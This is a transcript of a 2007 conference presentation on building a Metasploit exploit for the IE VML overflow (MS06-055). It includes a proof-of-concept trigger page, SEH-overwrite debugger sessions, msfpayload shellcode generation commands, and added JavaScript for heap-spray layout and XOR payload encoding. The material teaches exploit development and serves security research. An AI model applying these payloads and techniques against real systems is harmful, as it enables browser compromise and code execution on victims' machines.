More on Metasploit plugins: from vulnerability to exploit (transcript of a PowerPoint presentation)

1
More on Metasploit plugins: from vulnerability to exploit
  • Saumil Shah
  • ceo, net-square
  • EUSecWest - London 2007

2
who am i
  • Saumil Shah - "krafty"
  • ceo, net-square solutions
  • saumil@saumil.net
  • author "Web Hacking - Attacks and Defense"

  16:08  up 4:26, 1 user, load averages: 0.28 0.40 0.33
  USER     TTY      FROM     LOGIN@   IDLE  WHAT
  saumil   console  -        11:43    0:05  bash
3
From Vulnerability to Exploit
  Fuzzing -> Debugger -> Attack Vector -> EIP = 0x41414141
  -> Reliable EIP return address -> Bad characters -> Final Shellcode
  -> Test Shellcode (INT 3) -> Working exploit
  (Test Shellcode: INT 3 hit? -> Shellcode Handling)
4
The CPU's registers
  • The Intel 32-bit x86 registers

  EAX  accumulator          ESP  stack pointer
  EBX  base                 EBP  base pointer
  ECX  counter              ESI  source index
  EDX  data                 EDI  destination index
                            EIP  instruction pointer
5
The Process Memory Map
  0x08000000  .text
              .data
              .bss
              heap - malloc'ed data
              |
              v   (heap grows toward higher addresses)

              ^   (stack grows toward lower addresses)
              |
              stack
              main() local vars
              argc, argv, envp
              cmd line arguments
              environment vars
  0xc0000000
6
Win32 Process Memory Map
  0x00000000  error trapping
  0x00010000  program image
              heap
              stack
  0x40000000  DLLs
              DLLs
              DLLs
  0x7FFDE000  First TEB
  0x7FFDF000  PEB
  0x7FFE0000  Shared user page
  0x7FFE1000  No access
  0x7FFFFFFF
7
Getting control of EIP
  • Stack overflows
  • Heap overflows
  • Format string bugs
  • Integer overflows

8
Getting control of EIP
  • Overwrite saved return address
  • saved EIPs in stack frames
  • Overwrite exception handlers
  • SEH overwrites
  • Arbitrary memory overwrites
  • Controlling "what" and "where"

9
Browser overflows
  • Client-side exploits are becoming the rage.
  • ActiveX components.
  • Media handlers / libraries.
  • Toolbars / Plugins.
  • Platform specific characteristics.
  • Overflows delivered as HTTP responses.
  • "Surf-n-crash".

10
Browser overflows
  • Javascript / Vbscript helps in targeting
    vulnerable components
  • and building up the exploit on-the-fly.
  • Javascript is always enabled these days.

11
Exploit example - IE VML overflow
  • Buffer overflow in IE's VML implementation
  • MS06-055
  • <v:fill method="AAAAAAAA...">
  • Exploiting IE 6 on XP SP2
  • Triggering the exploit by overwriting SEH

12
Windows SEH
  • SEH - Structured Exception Handler
  • Windows pops up a dialog box
  • Default handler kicking in.

13
Exception handling
  • Try / catch block
  • Pointer to the exception handling code also saved
    on the stack, for each code block.

  try {
      code that may throw an exception.
  } catch {
      attempt to recover from the exception gracefully.
  }
14
Exception handling implementation
  stack (top to bottom):
    local vars
    saved EBP
    saved EIP
    params
    addr of exception handler  --> exception handler code (catch block)
    [frame w/ exception handling]
    more frames
    ...
  Bottom of stack
15
SEH Record
  • Each SEH record is of 8 bytes
  • These SEH records are found on the stack.
  • In sequence with the functions being called,
    interspersed among function (block) frames.
  • WinDBG command - !exchain

  SEH record (8 bytes):
    +-------------------------------+
    | ptr to next SEH record        |
    | address of exception handler  |
    +-------------------------------+
16
SEH Chain
  • Each SEH record is of 8 bytes

  SEH_record_1: [ptr to SEH_record_2      | addr of ex_handler1]  --> ex_handler1()
  SEH_record_2: [ptr to next SEH_record_n | addr of ex_handler2]  --> ex_handler2()
  ...
  SEH_record_n: [0xFFFFFFFF              | MSVCRT!exhandler]     --> default exception handler
  bottom of stack
17
SEH on the stack
  stack (top to bottom):
    func_z() frame
      [ptr to next SEH record | address of exception handler]  --> ex_handler_z()
    main() frame
      [ptr to next SEH record | address of exception handler]  --> MSVCRT!exhandler
    initial entry frame
      [0xFFFFFFFF             | address of exception handler]
18
Yet another way of getting EIP
  • Overwrite one of the addresses of the registered
    exception handlers
  • and, make the process throw an exception!
  • If no custom exception handlers are registered,
    overwrite the default SEH.
  • Might have to travel way down the stack
  • but in doing so, you get a long buffer!

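An added example, not code from the talk: an !exchain-style walk over a simulated 32-bit stack image, to show what the debugger reads when it follows the SEH chain of slides 15-17 and why a record smashed with 0x41414141 prints as "Invalid exception stack at 41414141" on slide 23. The stack base, record addresses and handler addresses are constructed for illustration.

```javascript
// Added example (not from the slides): model SEH records on a fake 32-bit stack,
// walk the chain the way WinDbg's !exchain does, then smash one record with 'A's.
const STACK_BASE = 0x0013b000;      // constructed: base of our fake stack image
const STACK_SIZE = 0x1000;
const CHAIN_END  = 0xffffffff;      // end-of-chain marker (slide 16)
const DEFAULT_HANDLER = 0x77c3aaaa; // constructed stand-in for MSVCRT!exhandler

// Little-endian 32-bit view of the fake stack; an address maps to STACK_BASE + offset.
const stack = new DataView(new ArrayBuffer(STACK_SIZE));
const inStack = (addr, len) => addr >= STACK_BASE && addr + len <= STACK_BASE + STACK_SIZE;
const read32  = (addr) => stack.getUint32(addr - STACK_BASE, true);
const write32 = (addr, v) => stack.setUint32(addr - STACK_BASE, v >>> 0, true);

// One SEH record is 8 bytes: [ptr to next record][address of handler] (slide 15).
function writeSehRecord(addr, next, handler) {
  write32(addr, next);
  write32(addr + 4, handler);
}

// Build the chain of slide 17: ex_handler_z -> main()'s handler -> default handler.
// Returns the head record, i.e. what fs:[0] would point at.
function buildChain() {
  writeSehRecord(0x0013b100, 0x0013b800, 0x00401a10); // ex_handler_z (constructed address)
  writeSehRecord(0x0013b800, 0x0013bff0, 0x00401000); // main()'s handler (constructed)
  writeSehRecord(0x0013bff0, CHAIN_END,  DEFAULT_HANDLER);
  return 0x0013b100;
}

// Follow "next" pointers from the head until CHAIN_END. A "next" value that does
// not point at an 8-byte, 4-byte-aligned record inside the stack is reported as
// invalid, which is exactly what an overflow that wrote 0x41414141 there produces.
function walkSehChain(head) {
  const records = [];
  let cur = head;
  for (let i = 0; i < 64; i++) {          // bound the walk in case the chain loops
    if (cur === CHAIN_END) return { records, valid: true };
    if (!inStack(cur, 8) || (cur & 3) !== 0) return { records, valid: false, invalidAt: cur };
    records.push({ record: cur, handler: read32(cur + 4) });
    cur = read32(cur);
  }
  return { records, valid: false, invalidAt: cur };
}

// Render the walk the way !exchain prints it: "<record>: <handler>" per record.
function formatExchain(result) {
  const hex = (v) => (v >>> 0).toString(16).padStart(8, "0");
  const lines = result.records.map((r) => `${hex(r.record)}: ${hex(r.handler)}`);
  if (!result.valid) lines.push(`Invalid exception stack at ${hex(result.invalidAt)}`);
  return lines;
}

// Slide 20: a run of fill bytes climbs the stack and over a record, replacing
// both its "next" pointer and its handler address.
function overflowInto(startAddr, length, fillByte) {
  for (let i = 0; i < length; i++) stack.setUint8(startAddr - STACK_BASE + i, fillByte);
}

const head = buildChain();
console.log(formatExchain(walkSehChain(head)).join("\n"));   // three records, ends cleanly
overflowInto(0x0013b0c0, 0x60, 0x41);                        // 'A' * 0x60 covers the record at 0x0013b100
console.log(formatExchain(walkSehChain(head)).join("\n"));   // "0013b100: 41414141" + invalid stack
```

Once the record is overwritten the dispatcher still calls whatever sits in the handler slot, which is how the 0x41414141 handler value turns into EIP = 0x41414141 on the next slide.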
19
Overwriting SEH
  buffer  (overflow runs toward higher addresses)
  saved EIP
  saved EBP
  params
  ptr to next SEH record        \  SEH record, reachable by the
  address of exception handler  /  overflowing buffer --> ex_handler()
20
Overwriting SEH
  AAAA AAAA AAAA ...   buffer filled with 0x41
  AAAA                 saved EIP
  AAAA                 saved EBP
  AAAA                 params
  AAAA                 ptr to next SEH record
  AAAA AAAA AAAA ...   address of exception handler (e.g. overwritten with BBBB)

  Illegal memory access causes a segmentation fault (access violation).
  OS invokes the registered exception handler in the chain --> EIP = 0x42424242
21
Stage 1
  • proof of concept

  <head>
  <object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E"></object>
  <style>v\:* { behavior: url(#VMLRender); }</style>
  </head>
  <body>
  <v:rect style='width:120pt;height:80pt' fillcolor="red">
  <script>
  document.write("<v:fill method=\"");
  for(i = 0; i < 2625; i++) document.write("\x41\x41\x41\x41\x41\x41\x41\x41");
  document.write("\">");
  </script>
  </v:rect></v:fill>
  </body>
22
Setting up the exploit
  • Serve up the exploit page over HTTP
  • Point IE and surf to the page
  • with a debugger attached to it

  $ ./daemon.pl ie_vml1.html
  Starting HTTP server on 8080
23
Crashing IE
  • Surf-n-crash

  (18c.584): Access violation - code c0000005 (first chance)
  eax=0013b4c4 ebx=001df20c ecx=0013b4b8 edx=00004141 esi=0000259e edi=00140000
  eip=5deded1e esp=0013b4a0 ebp=0013b6c8 iopl=0         nv up ei pl nz na po nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
  vgx!DllMain_gdiplus+0x30e8d:
  5deded1e 668917          mov     word ptr [edi],dx    ds:0023:00140000=6341
  0:000> !exchain
  0013e420: 41414141
  Invalid exception stack at 41414141
  0:000> g
  (18c.584): Access violation - code c0000005 (first chance)
  eax=00000000 ebx=00000000 ecx=41414141 edx=7c9037d8 esi=00000000 edi=00000000
  eip=41414141 esp=0013b0d0 ebp=0013b0f0 iopl=0         nv up ei pl zr na po nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
  41414141 ??              ???
24
EIP = 0x41414141
  • We control EIP.
  • Where do you want to go?
  • Direct return to stack?
  • XP SP2 doesn't allow it: SafeSEH refuses to call a handler whose address lies on the stack.
  • Jump through registers?
  • EDX, ESP and EBP are the only possible options, but they don't point to our buffer.
  • Other registers are cleared, thanks to XP SP2: the exception dispatcher zeroes them before calling the handler.
  • XP SP2 also forbids jumping into DLLs: with SafeSEH, a handler address inside a loaded module is only accepted if it is in that module's registered handler table.

25
How do we pull it off?
  • In other circumstances, we'd have to go through
    long tedious routes
  • or publish a DoS exploit and call it a day.
  • L4m3
  • We are exploiting a browser.
  • Browsers run Javascript.
  • Javascript has arrays.
  • Javascript arrays occupy heap memory.

26
Loading our buffer in the heap
  • Can we load our shellcode in the heap via
    Javascript?
  • How do we know where our buffer lies?
  • Direct jump into heap?
  • yes! that is possible.

27
Heap Spraying
  • Technique pioneered by Skylined.
  • Make a VERY large NOP sled.
  • Append shellcode at its end.
  • Create multiple instances of this NOP sled in the
    heap memory.
  • using Javascript arrays: a[0] = str; a[1] = str; ...
  • The heap gets "sprayed" with our payloads.
  • Land somewhere in the NOPs, and you win.

28
Heap Spraying
  <script>
  spray = build_large_nopsled();
  a = new Array();
  for(i = 0; i < 100; i++) a[i] = spray + shellcode;
  </script>
  <html>
  exploit trigger condition goes here
  </html>

  Resulting heap layout:
    a[7]  [ NOP sled ............................ | shellcode ]
    a[8]  [ NOP sled ............................ | shellcode ]
    a[9]  [ NOP sled ............................ | shellcode ]
29
Tips on Heap Spraying
  • Make really large NOP sleds
  • approx 800,000 bytes per spray block
  • Adjust the size of the NOP sled to leave very
    little holes inbetween spray blocks.
  • Javascript Unicode encoding works great for
    shellcode.
  • shellcode = unescape("%uXXXX%uXXXX...")
  • Null bytes are not a problem anymore.

30
Stage 2
  • Placeholder INT3 shellcode.
  • Look for "90 90 90 90 cc cc cc cc" in the memory
    after IE crashes.

  0:000> s 02000000 l fffffff 90 90 90 90 cc cc cc cc
  02150020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
  02360020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
  02570020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
  02780020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
  02990020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
  02ba0020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
  02db0020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
  02fc0020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
  031d0020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
  033e0020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................

31
Jump to heap
  • We can point EIP to any of the sprayed blocks.
  • Arbitrarily choose addresses:
  • 0x03030303
  • 0x04040404
  • 0x05050505, etc.
  • Verify if they land in the NOP zones.

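An added example, not code from the talk: the spray arithmetic of slides 27-31 as runnable JavaScript. jsUnescape() does what the Pex::Utils::JSUnescape() wrapper of slide 43 does (raw bytes to "%uXXXX" text that unescape() turns back into the same bytes, null bytes included), buildSprayBlock() assembles one NOP sled plus shellcode block of a fixed byte size, and classifyLanding() answers slide 31's question of whether an arbitrarily chosen address such as 0x05050505 lands in a NOP zone. The block start addresses (spaced 0x210000 apart like the search hits on slide 30), the block size and the INT 3 placeholder shellcode are constructed for illustration; nothing here touches a real heap.

```javascript
// Added example (not from the slides): %u encoding, spray block layout and landing check.

// Bytes -> "%uXXXX" escapes. unescape() decodes each %uXXXX to one 16-bit code unit,
// which IE stores little-endian, so the byte pair [lo, hi] is written as %u<hi><lo>.
// An odd trailing byte is padded with a NOP (assumption: the real wrapper's padding
// rule is not shown on the slides).
function jsUnescape(bytes) {
  const b = bytes.length % 2 ? [...bytes, 0x90] : [...bytes];
  let out = "";
  for (let i = 0; i < b.length; i += 2) {
    out += "%u" + ((b[i + 1] << 8) | b[i]).toString(16).padStart(4, "0");
  }
  return out;
}

// What unescape() does with %uXXXX input: one code unit per escape.
function decodeUnescape(escaped) {
  return escaped.replace(/%u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// How a JS string sits in memory (UTF-16LE), i.e. the bytes the CPU will execute.
function stringToBytes(s) {
  const out = [];
  for (let i = 0; i < s.length; i++) {
    const cu = s.charCodeAt(i);
    out.push(cu & 0xff, cu >>> 8);
  }
  return out;
}

// One spray block of exactly blockBytes bytes: NOP sled first, shellcode at the end.
// Every character is two bytes, so string lengths are half the byte counts.
function buildSprayBlock(shellcode, blockBytes) {
  if (shellcode.length % 2 || blockBytes % 2) throw new Error("sizes must be even");
  const sled = "\u9090".repeat((blockBytes - shellcode.length) / 2);  // 0x90 0x90 per char
  return sled + decodeUnescape(jsUnescape(shellcode));
}

// Slide 28's loop. The intent of building the string inside the loop is one fresh
// copy per iteration (IE's JScript allocated a new string for each concatenation).
function sprayHeap(shellcode, blockBytes, count) {
  const a = new Array();
  for (let i = 0; i < count; i++) a[i] = buildSprayBlock(shellcode, blockBytes);
  return a;
}

// Slide 31: pick an address and check where it lands, given the block start
// addresses a debugger search reported. Between blocks is a "hole": EIP would land
// on something other than our spray and the process would just crash.
function classifyLanding(addr, blockStarts, blockBytes, shellcodeLen) {
  const sledBytes = blockBytes - shellcodeLen;
  for (const base of blockStarts) {
    const off = addr - base;
    if (off < 0 || off >= blockBytes) continue;
    if (off < sledBytes) return { region: "nop-sled", base, offset: off, nopsToShellcode: sledBytes - off };
    return { region: "shellcode", base, offset: off, nopsToShellcode: 0 };
  }
  return { region: "hole" };
}

// Constructed sample data: INT 3 placeholder shellcode (slide 30) and 50 blocks whose
// starts follow the 0x210000 spacing of slide 30's hits, each assumed to hold
// 0x1F0000 bytes of sled + shellcode (the rest of the stride is allocator overhead).
const INT3_SHELLCODE = [0xcc, 0xcc, 0xcc, 0xcc];
const BLOCK_BYTES = 0x1f0000;
const BLOCK_STARTS = Array.from({ length: 50 }, (_, k) => 0x02150020 + k * 0x210000);

sprayHeap(INT3_SHELLCODE, 0x1000, 4);   // small blocks here; the talk uses ~800,000 bytes each
for (const addr of [0x03030303, 0x04040404, 0x05050505]) {
  console.log(addr.toString(16), classifyLanding(addr, BLOCK_STARTS, BLOCK_BYTES, INT3_SHELLCODE.length));
}
```

With the constructed layout all three candidate addresses fall inside NOP sleds, which is what the `db 0x05050505` dump on slide 34 confirms for the real spray; the same function flags an address in the gap between two blocks as a hole, which is why the tip on slide 29 is to size blocks so the gaps are as small as possible.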
32
Stage 3
  • Overwrite SEH record with 0x05050505.
  • INT 3 shellcode.
  • Causes EIP to land into one of the NOP zones
  • and eventually reach our dummy shellcode.

33
Stage 3
  • Overwriting SEH

  0:000> g
  (148.360): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=0013b648 ebx=001dbc94 ecx=0013b63c edx=00000505 esi=000024dc edi=00140000
  eip=5deded1e esp=0013b624 ebp=0013b84c iopl=0         nv up ei pl nz na pe nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
  vgx!DllMain_gdiplus+0x30e8d:
  5deded1e 668917          mov     word ptr [edi],dx    ds:0023:00140000=6341
  0:000> !exchain
  0013e5a4: 05050505
  Invalid exception stack at 05050505
34
Stage 3
  • Landing in the NOP zone, and hitting INT 3

  0:000> db 0x05050505
  05050505  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
  05050515  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
  0:000> g
  (148.360): Break instruction exception - code 80000003 (first chance)
  eax=00000000 ebx=00000000 ecx=05050505 edx=7c9037d8 esi=00000000 edi=00000000
  eip=05230024 esp=0013b254 ebp=0013b274 iopl=0         nv up ei pl zr na po nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
  05230024 cc              int     3
  0:000> u 05230024
  05230024 cc              int     3
  05230025 cc              int     3
  05230026 cc              int     3
35
Introducing Metasploit
  • An advanced open-source exploit research and
    development framework.
  • http://metasploit.com
  • Current stable version 2.7
  • Written in Perl, runs on Unix and Win32 (cygwin)
  • Brand new 3.0
  • Complete rewrite in Ruby

36
Introducing Metasploit
  • Generate shellcode.
  • Shellcode encoding.
  • Shellcode handlers.
  • Scanning binaries for specific instructions
  • e.g. POP/POP/RET, JMP ESI, etc.
  • Ability to add custom exploits, shellcode,
    encoders.
  • and lots more.

37
Enter Shellcode
  • Code assembled in the CPU's native instruction
    set.
  • Injected as a part of the buffer that is
    overflowed.
  • Most typical function of the injected code is to
    "spawn a shell" - ergo "shellcode".
  • A buffer containing shellcode is termed as
    "payload".

38
Writing Shellcode
  • Need to know the CPU's native instruction set
  • e.g. x86 (ia32), x86-64 (amd64), ia64, ppc, sparc, etc.
  • Tight assembly language.
  • OS specific system calls.
  • Shellcode libraries and generators.
  • Metasploit Framework.

39
A little about shellcode
  • Types of shellcode
  • Bind shell
  • Exec command
  • Reverse shell
  • Staged shell, etc.
  • Advanced techniques
  • Meterpreter
  • Uploading and running DLLs "in-process"
  • etc.

40
Payload Encoders
  • Payload encoders create encoded shellcode, which
    meets certain criteria.
  • e.g. Alpha2 generates shellcode that consists only of
    alphanumeric bytes.
  • Allows us to bypass any protocol parsing
    mechanisms / byte filters.
  • An extra "decoder" is added to the beginning of
    the shellcode.
  • size may increase.

41
Payload Encoders
  • Example Alpha2 encoding
  • Transforms raw payload into alphanumeric only
    shellcode.
  • Decoder decodes the payload "in-memory".

  original shellcode (bytes 0-255)
        |
        v
  [ decoder ][ UnWQ89Jas281EEIIkla2wnhaAS901las... ]   (alphanumeric only)
42
Payload Encoders
  • Metasploit offers many types of encoders.
  • Work around protocol parsing
  • e.g. avoid CR, LF, NULL
  • toupper(), tolower(), etc.
  • Defeat IDS
  • Polymorphic Shellcode
  • Shikata Ga Nai

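An added example, not code from the talk or from Metasploit's encoders: a minimal single-byte XOR payload encoder of the kind slides 40-42 describe. It picks a key such that neither the key nor any encoded byte is a bad character, prepends a decoder stub that restores the payload in memory, and makes the size increase visible. The stub is a constructed 21-byte x86 sequence and the sample payload is a constructed placeholder with deliberate NULL, LF and CR bytes, not working shellcode.

```javascript
// Added example (not from the slides): bad-character-avoiding XOR encoder with decoder stub.
const BAD_CHARS = new Set([0x00, 0x0a, 0x0d]);   // NULL, LF, CR (slide 42)
const DECODER_LEN = 21;

// Smallest key for which the key and every (payload byte XOR key) avoid the bad set.
function findXorKey(payload, bad = BAD_CHARS) {
  for (let key = 1; key < 256; key++) {
    if (!bad.has(key) && payload.every((b) => !bad.has(b ^ key))) return key;
  }
  return null;
}

// x86 decoder stub (constructed). call/pop puts the payload address in esi, each
// byte is XORed with the key in place, then execution falls into the payload.
function decoderStub(len, key) {
  return [
    0xeb, 0x0e,                    // jmp short +0x0e      -> the call below
    0x5e,                          // pop esi               esi = payload address
    0x31, 0xc9,                    // xor ecx, ecx
    0xb1, len,                     // mov cl, len           (index 6)
    0x80, 0x36, key,               // xor byte [esi], key   (index 9)   <- loop body
    0x46,                          // inc esi
    0xe2, 0xfa,                    // loop -6
    0xeb, 0x06,                    // jmp short +6         -> payload
    0x90,                          // nop (keeps every offset byte clear of bad chars)
    0xe8, 0xed, 0xff, 0xff, 0xff,  // call pop-esi (pushes the payload address)
  ];
}

function encodePayload(payload, bad = BAD_CHARS) {
  const body = [...payload];
  // "mov cl, len" embeds the length as a byte, so it must avoid bad chars too; a
  // trailing NOP past the payload's end bumps the count without changing behaviour.
  while (bad.has(body.length)) body.push(0x90);
  if (body.length > 255) throw new Error("single-byte counter: payload too long");
  const key = findXorKey(body, bad);
  if (key === null) throw new Error("no single-byte XOR key avoids the bad chars");
  const bytes = [...decoderStub(body.length, key), ...body.map((b) => b ^ key)];
  // Everything that goes over the wire must pass the filter, stub included.
  if (bytes.some((b) => bad.has(b))) throw new Error("stub byte collides with bad chars");
  return { key, bytes };
}

// Emulate what the stub does at run time: read count and key out of the stub, XOR
// the bytes that follow it, and hand back the restored payload.
function runDecoder(blob) {
  const len = blob[6], key = blob[9];
  return blob.slice(DECODER_LEN, DECODER_LEN + len).map((b) => b ^ key);
}

// Constructed placeholder "payload": a few plausible x86 bytes plus deliberate
// NULL, LF and CR bytes that a text protocol would mangle, and 0x01..0x03 so that
// the first few candidate keys are rejected.
const SAMPLE_PAYLOAD = [0x31, 0xc0, 0x50, 0x68, 0x63, 0x61, 0x6c, 0x63,
                        0x00, 0x0a, 0x0d, 0x01, 0x02, 0x03, 0x90, 0xc3];

const encoded = encodePayload(SAMPLE_PAYLOAD);
console.log("key", encoded.key, "size", SAMPLE_PAYLOAD.length, "->", encoded.bytes.length);
console.log(encoded.bytes.map((b) => b.toString(16).padStart(2, "0")).join(" "));
```

The size grows by the fixed stub length, exactly the "extra decoder" cost slide 40 mentions; a real encoder such as Alpha2 pays a much larger price because every payload byte expands into several alphanumeric ones.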
43
Using Metasploit to generate shellcode
  • We need Javascript Unicode (%u) encoded shellcode.
  • No payload encoding needed: the %u encoding carries null bytes fine.
  • We will run "calc.exe".
  • msfpayload - cmdline shellcode generation.
  • msfencode - cmdline shellcode encoder.
  • jsencode.pl - wrapper around Metasploit's
    Pex::Utils::JSUnescape() function.

44
Generate calc.exe shellcode
  • Generate JS-encoded shellcode.
  • Final version contains working shellcode.
  • A slight problem:
  • too many calc.exe windows!

  $ ./msfpayload win32_exec EXITFUNC="seh" CMD="calc.exe" R | ./jsencode.pl
45
Exit function - "thread" vs. "seh"
  • Exiting via SEH raises an exception when the payload finishes; the
    exception dispatcher walks the still-overwritten SEH chain and lands in
    our sprayed heap again, so the whole thing repeats itself.
  • EXITFUNC="thread" terminates only the current thread instead.
  • Re-generate the shellcode using EXITFUNC="thread":

  $ ./msfpayload win32_exec EXITFUNC="thread" CMD="calc.exe" R | ./jsencode.pl
46
Writing Metasploit exploit modules
  • Integration within the Metasploit framework.
  • Multiple target support.
  • Dynamic payload selection.
  • Dynamic payload encoding.
  • Built-in payload handlers.
  • Can use advanced payloads.
  • a highly portable, flexible and rugged exploit!

47
How Metasploit runs an exploit
  • List of known target values
  • User-supplied exploit info
  • Metasploit shellcode library
  • Encoders
  • Payload handlers
48
Writing a Metasploit exploit
  • Perl module (2.7), Ruby module (3.0)
  • Pre-existing data structures
  • info, advanced
  • Constructor
  • sub new
  • Exploit code
  • sub Exploit

49
Structure of the exploit perl module
  package Msf::Exploit::name;
  use base "Msf::Exploit";
  use strict;
  use Pex::Text;

  my $advanced = { };   # advanced options
  my $info     = { };   # information block (next slide)

  sub new {             # constructor: return an instance of our exploit
    my $class = shift;
    return $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  }

  sub Exploit {         # exploit block
    my $self = shift;
  }
  1;
50
info
  • Name
  • Version
  • Authors
  • Arch
  • OS
  • Priv
  • UserOpts
  • Payload
  • Encoder
  • Refs
  • DefaultTarget
  • Targets
  • Keys

51
Metasploit Pex
  • Perl EXtensions.
  • <metasploit_home>/lib/Pex.pm
  • <metasploit_home>/lib/Pex/
  • Text processing routines.
  • Socket management routines.
  • Protocol specific routines.
  • These and more are available for us to use in our
    exploit code.

52
Pex Utilities
  • Pex::Text
  • Encoding and Decoding, Pattern Generation, Random
    text generation, Padding, etc
  • Pex::Socket
  • TCP, UDP, SSL TCP, Raw UDP
  • Protocol specific utilities
  • SMB, DCE RPC, Sun RPC, MSSQL, etc

53
Pex - miscellaneous utilities
  • Pex::Utils
  • Array and hash manipulation
  • Bit rotates
  • Read and write files
  • Format String generator
  • Create Win32 PE files
  • Create Javascript arrays
  • a whole lot of miscellany!

54
Finished examples
  • my_ie_vml.pm

55
New in Version 3.0
  • msfd
  • Metasploit daemon, allows for client-server
    operation of Metasploit.
  • msfopcode
  • command line interface to Metasploit's online
    opcode database.
  • msfwx
  • a GUI interface using wxruby.

56
New in Version 3.0
  • New payloads, new encoders.
  • Ruby extension - Rex (similar to Pex)
  • NASM shell.
  • Back end Database support.
  • whole lot of goodies here and there.

57
Thank You!
  • Saumil Shah
  • saumil@saumil.net
  • http://net-square.com
  • +91 98254 31192